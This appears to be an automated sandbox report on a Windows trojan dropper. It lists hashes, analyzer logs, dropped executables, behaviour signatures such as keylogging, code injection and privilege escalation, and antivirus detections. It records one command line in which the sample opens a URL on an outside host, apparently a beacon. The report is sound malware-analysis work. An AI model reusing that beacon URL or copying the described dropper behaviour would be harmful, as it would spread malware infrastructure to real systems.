Size | 361.0KB |
---|---|
Type | PE32 executable (GUI) Intel 80386, for MS Windows |
MD5 | ca10e004e1db404454d24b2724510646 |
SHA1 | 2ffbf5974e270a0278967c917bb7be732d7bc7e4 |
SHA256 | 476b5e10408bf7e8687fc971a216e47c25089af2fd75e148afb43a7db72a498a |
SHA512 |
9d38b752c7ac10aed1db9780b03a46454fd1d68f762b11aeaa0c7106b35aa8eaf5fa7b82cf37073e6db7a15b77be12af5a3d59bf6a09e2c3004eb65133949148
|
CRC32 | 935A4638 |
ssdeep | None |
PDB Path | f:\软件工ç¨\驱å¨ç¼ç¨\OK\KernelYK\bin\InstallSYS.pdb |
Yara |
|
This file is very suspicious, with a score of 10 out of 10!
Please notice: The scoring system is currently still in development and should be considered an alpha feature.
Expecting different results? Send us this analysis and we will inspect it. Click here
Category | Started | Completed | Duration | Routing | Logs |
---|---|---|---|---|---|
FILE | July 14, 2025, 4:59 a.m. | July 14, 2025, 5:06 a.m. | 386 seconds | internet |
Show Analyzer Log Show Cuckoo Log |
2025-07-09 05:53:30,015 [analyzer] DEBUG: Starting analyzer from: C:\tmpwwr_kc 2025-07-09 05:53:30,030 [analyzer] DEBUG: Pipe server name: \??\PIPE\YHIKWLxAAHxmjnDeoUERyLw 2025-07-09 05:53:30,030 [analyzer] DEBUG: Log pipe server name: \??\PIPE\mbvUvJiAaAwiPJXXmAbXRf 2025-07-09 05:53:30,358 [analyzer] DEBUG: Started auxiliary module Curtain 2025-07-09 05:53:30,358 [analyzer] DEBUG: Started auxiliary module DbgView 2025-07-09 05:53:31,217 [analyzer] DEBUG: Started auxiliary module Disguise 2025-07-09 05:53:31,453 [analyzer] DEBUG: Loaded monitor into process with pid 504 2025-07-09 05:53:31,453 [analyzer] DEBUG: Started auxiliary module DumpTLSMasterSecrets 2025-07-09 05:53:31,453 [analyzer] DEBUG: Started auxiliary module Human 2025-07-09 05:53:31,453 [analyzer] DEBUG: Started auxiliary module InstallCertificate 2025-07-09 05:53:31,453 [analyzer] DEBUG: Started auxiliary module Reboot 2025-07-09 05:53:31,515 [analyzer] DEBUG: Started auxiliary module RecentFiles 2025-07-09 05:53:31,515 [analyzer] DEBUG: Started auxiliary module Screenshots 2025-07-09 05:53:31,515 [analyzer] DEBUG: Started auxiliary module Sysmon 2025-07-09 05:53:31,515 [analyzer] DEBUG: Started auxiliary module LoadZer0m0n 2025-07-09 05:53:31,687 [lib.api.process] INFO: Successfully executed process from path u'C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\476b5e10408bf7e8687fc971a216e47c25089af2fd75e148afb43a7db72a498a.exe' with arguments '' and pid 300 2025-07-09 05:53:31,858 [analyzer] DEBUG: Loaded monitor into process with pid 300 2025-07-09 05:53:32,405 [analyzer] INFO: Added new file to list with pid 300 and path C:\Temp\CreateProcess.exe 2025-07-09 05:53:33,405 [analyzer] INFO: Added new file to list with pid 300 and path C:\Temp\gbytrljdbvtolgey.exe 2025-07-09 05:53:33,530 [analyzer] INFO: Injected into process with pid 1440 and name u'gbytrljdbvtolgey.exe' 2025-07-09 05:53:33,717 [analyzer] DEBUG: Loaded monitor into process with pid 1440 2025-07-09 05:53:33,733 [analyzer] INFO: Added new file to list with pid 1440 and path \Device\NamedPipe\lsass 2025-07-09 05:53:33,812 [analyzer] INFO: Injected into process with pid 344 and name u'iexplore.exe' 2025-07-09 05:53:34,046 [analyzer] DEBUG: Loaded monitor into process with pid 344 2025-07-09 05:53:35,812 [analyzer] INFO: Added new file to list with pid 300 and path C:\Temp\gbytrljdbvtolgey.sys 2025-07-09 05:53:36,437 [analyzer] INFO: Added new file to list with pid 1440 and path C:\Temp\zxrpkhcaus.exe 2025-07-09 05:53:36,500 [analyzer] INFO: Injected into process with pid 220 and name u'CreateProcess.exe' 2025-07-09 05:53:36,655 [analyzer] DEBUG: Loaded monitor into process with pid 220 2025-07-09 05:53:36,687 [analyzer] INFO: Process with pid 300 has terminated 2025-07-09 05:53:37,687 [analyzer] INFO: Process with pid 220 has terminated 2025-07-09 05:53:38,921 [analyzer] INFO: Added new file to list with pid 1440 and path C:\Temp\i_zxrpkhcaus.exe 2025-07-09 05:53:44,312 [analyzer] INFO: Added new file to list with pid 1440 and path C:\Temp\rpjhczurmk.exe 2025-07-09 05:54:00,687 [analyzer] INFO: Analysis timeout hit, terminating analysis. 2025-07-09 05:54:01,062 [analyzer] INFO: Terminating remaining processes before shutdown. 2025-07-09 05:54:01,062 [lib.api.process] INFO: Successfully terminated process with pid 1440. 2025-07-09 05:54:01,062 [lib.api.process] INFO: Successfully terminated process with pid 344. 2025-07-09 05:54:01,078 [analyzer] WARNING: File at path u'\\device\\namedpipe\\lsass' does not exist, skip. 2025-07-09 05:54:01,125 [analyzer] INFO: Analysis completed.
2025-07-14 04:59:55,075 [cuckoo.core.scheduler] INFO: Task #6702928: acquired machine win7x645 (label=win7x645) 2025-07-14 04:59:55,076 [cuckoo.core.resultserver] DEBUG: Now tracking machine 192.168.168.205 for task #6702928 2025-07-14 04:59:55,533 [cuckoo.auxiliary.sniffer] INFO: Started sniffer with PID 975800 (interface=vboxnet0, host=192.168.168.205) 2025-07-14 04:59:56,064 [cuckoo.machinery.virtualbox] DEBUG: Starting vm win7x645 2025-07-14 04:59:57,104 [cuckoo.machinery.virtualbox] DEBUG: Restoring virtual machine win7x645 to vmcloak 2025-07-14 05:02:52,848 [cuckoo.core.guest] INFO: Starting analysis #6702928 on guest (id=win7x645, ip=192.168.168.205) 2025-07-14 05:02:53,853 [cuckoo.core.guest] DEBUG: win7x645: not ready yet 2025-07-14 05:02:58,908 [cuckoo.core.guest] INFO: Guest is running Cuckoo Agent 0.10 (id=win7x645, ip=192.168.168.205) 2025-07-14 05:02:59,186 [cuckoo.core.guest] DEBUG: Uploading analyzer to guest (id=win7x645, ip=192.168.168.205, monitor=latest, size=6660546) 2025-07-14 05:03:00,860 [cuckoo.core.resultserver] DEBUG: Task #6702928: live log analysis.log initialized. 2025-07-14 05:03:02,260 [cuckoo.core.resultserver] DEBUG: Task #6702928 is sending a BSON stream 2025-07-14 05:03:02,650 [cuckoo.core.resultserver] DEBUG: Task #6702928 is sending a BSON stream 2025-07-14 05:03:03,514 [cuckoo.core.resultserver] DEBUG: Task #6702928: File upload for 'shots/0001.jpg' 2025-07-14 05:03:03,529 [cuckoo.core.resultserver] DEBUG: Task #6702928 uploaded file length: 133472 2025-07-14 05:03:04,494 [cuckoo.core.resultserver] DEBUG: Task #6702928 is sending a BSON stream 2025-07-14 05:03:04,830 [cuckoo.core.resultserver] DEBUG: Task #6702928 is sending a BSON stream 2025-07-14 05:03:07,479 [cuckoo.core.resultserver] DEBUG: Task #6702928 is sending a BSON stream 2025-07-14 05:03:07,941 [cuckoo.core.resultserver] DEBUG: Task #6702928: File upload for 'files/37e2ccd1b5ced8b2_zxrpkhcaus.exe' 2025-07-14 05:03:08,082 [cuckoo.core.resultserver] DEBUG: Task #6702928 uploaded file length: 369664 2025-07-14 05:03:12,559 [cuckoo.core.resultserver] DEBUG: Task #6702928: File upload for 'files/ec08a7de98f01100_i_zxrpkhcaus.exe' 2025-07-14 05:03:12,633 [cuckoo.core.resultserver] DEBUG: Task #6702928 uploaded file length: 369664 2025-07-14 05:03:15,591 [cuckoo.core.guest] DEBUG: win7x645: analysis #6702928 still processing 2025-07-14 05:03:30,858 [cuckoo.core.guest] DEBUG: win7x645: analysis #6702928 still processing 2025-07-14 05:03:31,799 [cuckoo.core.resultserver] DEBUG: Task #6702928: File upload for 'curtain/1752033240.89.curtain.log' 2025-07-14 05:03:31,806 [cuckoo.core.resultserver] DEBUG: Task #6702928 uploaded file length: 36 2025-07-14 05:03:31,962 [cuckoo.core.resultserver] DEBUG: Task #6702928: File upload for 'sysmon/1752033241.05.sysmon.xml' 2025-07-14 05:03:31,974 [cuckoo.core.resultserver] DEBUG: Task #6702928 uploaded file length: 1211218 2025-07-14 05:03:31,987 [cuckoo.core.resultserver] DEBUG: Task #6702928: File upload for 'files/36c43f5069351d1f_gbytrljdbvtolgey.sys' 2025-07-14 05:03:31,992 [cuckoo.core.resultserver] DEBUG: Task #6702928 uploaded file length: 300544 2025-07-14 05:03:32,000 [cuckoo.core.resultserver] DEBUG: Task #6702928: File upload for 'files/d5e3d5406e3c5490_rpjhczurmk.exe' 2025-07-14 05:03:32,005 [cuckoo.core.resultserver] DEBUG: Task #6702928 uploaded file length: 369664 2025-07-14 05:03:32,014 [cuckoo.core.resultserver] DEBUG: Task #6702928: File upload for 'files/04917a73e42e462a_gbytrljdbvtolgey.exe' 2025-07-14 05:03:32,019 [cuckoo.core.resultserver] DEBUG: Task #6702928 uploaded file length: 369664 2025-07-14 05:03:32,023 [cuckoo.core.resultserver] DEBUG: Task #6702928: File upload for 'files/7e42d5452929b41e_createprocess.exe' 2025-07-14 05:03:32,025 [cuckoo.core.resultserver] DEBUG: Task #6702928 uploaded file length: 3584 2025-07-14 05:03:32,236 [cuckoo.core.resultserver] DEBUG: Task #6702928 had connection reset for <Context for LOG> 2025-07-14 05:03:34,012 [cuckoo.core.guest] INFO: win7x645: analysis completed successfully 2025-07-14 05:03:34,063 [cuckoo.core.plugins] DEBUG: Stopped auxiliary module: Redsocks 2025-07-14 05:03:34,101 [cuckoo.core.plugins] DEBUG: Stopped auxiliary module: Sniffer 2025-07-14 05:03:35,560 [cuckoo.machinery.virtualbox] INFO: Successfully generated memory dump for virtual machine with label win7x645 to path /srv/cuckoo/cwd/storage/analyses/6702928/memory.dmp 2025-07-14 05:03:35,574 [cuckoo.machinery.virtualbox] DEBUG: Stopping vm win7x645 2025-07-14 05:06:21,327 [cuckoo.core.resultserver] DEBUG: Stopped tracking machine 192.168.168.205 for task #6702928 2025-07-14 05:06:21,757 [cuckoo.core.scheduler] DEBUG: Released database task #6702928 2025-07-14 05:06:21,778 [cuckoo.core.scheduler] INFO: Task #6702928: analysis procedure completed
description | Possibly employs anti-virtualization techniques | rule | vmdetect | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | inject_thread | ||||||
description | Create a windows service | rule | create_service | ||||||
description | Communications over HTTP | rule | network_http | ||||||
description | File downloader/dropper | rule | network_dropper | ||||||
description | Communications over RAW socket | rule | network_tcp_socket | ||||||
description | Escalade priviledges | rule | escalate_priv | ||||||
description | Take screenshot | rule | screenshot | ||||||
description | Run a keylogger | rule | keylogger |
pdb_path | f:\软件工ç¨\驱å¨ç¼ç¨\OK\KernelYK\bin\InstallSYS.pdb |
name | RT_ICON | language | LANG_CHINESE | filetype | Device independent bitmap graphic, 13 x 26 x 8, image size 208, 256 important colors | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0005bec0 | size | 0x0000052c | ||||||||||||||||||
name | RT_ICON | language | LANG_CHINESE | filetype | Device independent bitmap graphic, 13 x 26 x 8, image size 208, 256 important colors | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0005bec0 | size | 0x0000052c | ||||||||||||||||||
name | RT_ICON | language | LANG_CHINESE | filetype | Device independent bitmap graphic, 13 x 26 x 8, image size 208, 256 important colors | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0005bec0 | size | 0x0000052c | ||||||||||||||||||
name | RT_ICON | language | LANG_CHINESE | filetype | Device independent bitmap graphic, 13 x 26 x 8, image size 208, 256 important colors | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0005bec0 | size | 0x0000052c | ||||||||||||||||||
name | RT_DIALOG | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0005c3ec | size | 0x00000094 | ||||||||||||||||||
name | RT_GROUP_ICON | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0005c480 | size | 0x0000003e | ||||||||||||||||||
name | RT_VERSION | language | LANG_CHINESE | filetype | data | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x0005c4c0 | size | 0x000002cc |
file | C:\Temp\i_zxrpkhcaus.exe |
file | C:\Temp\rpjhczurmk.exe |
file | C:\Temp\zxrpkhcaus.exe |
file | C:\Temp\gbytrljdbvtolgey.exe |
file | C:\Temp\CreateProcess.exe |
cmdline | C:\Program Files\Internet Explorer\iexplore.exe http://xytets.com:2345/t.asp?os=home |
file | C:\Temp\zxrpkhcaus.exe |
G Data Antivirus (Windows) | Virus: Trojan.Generic.7761207 (Engine A), Win32.Trojan.PSE1.YSVY3N (Engine B) |
Avast Core Security (Linux) | MBR:Backboot-D [Rtk] |
C4S ClamAV (Linux) | Win.Malware.Mikey-9949492-0 |
Trellix (Linux) | Generic Dropper.aoe trojan |
WithSecure (Linux) | Trojan.TR/Rogue.7909438 |
eScan Antivirus (Linux) | Trojan.Generic.7761207(DB) |
ESET Security (Windows) | Win32/Agent.PGA trojan |
Sophos Anti-Virus (Linux) | Troj/Drop-GZ |
DrWeb Antivirus (Linux) | Trojan.Click2.32800 |
ClamAV (Linux) | Win.Malware.Mikey-9949492-0 |
Bitdefender Antivirus (Linux) | Trojan.Generic.7761207 |
Kaspersky Standard (Windows) | Trojan.Win32.Tiny.cm |
Emsisoft Commandline Scanner (Windows) | Trojan.Generic.7761207 (B) |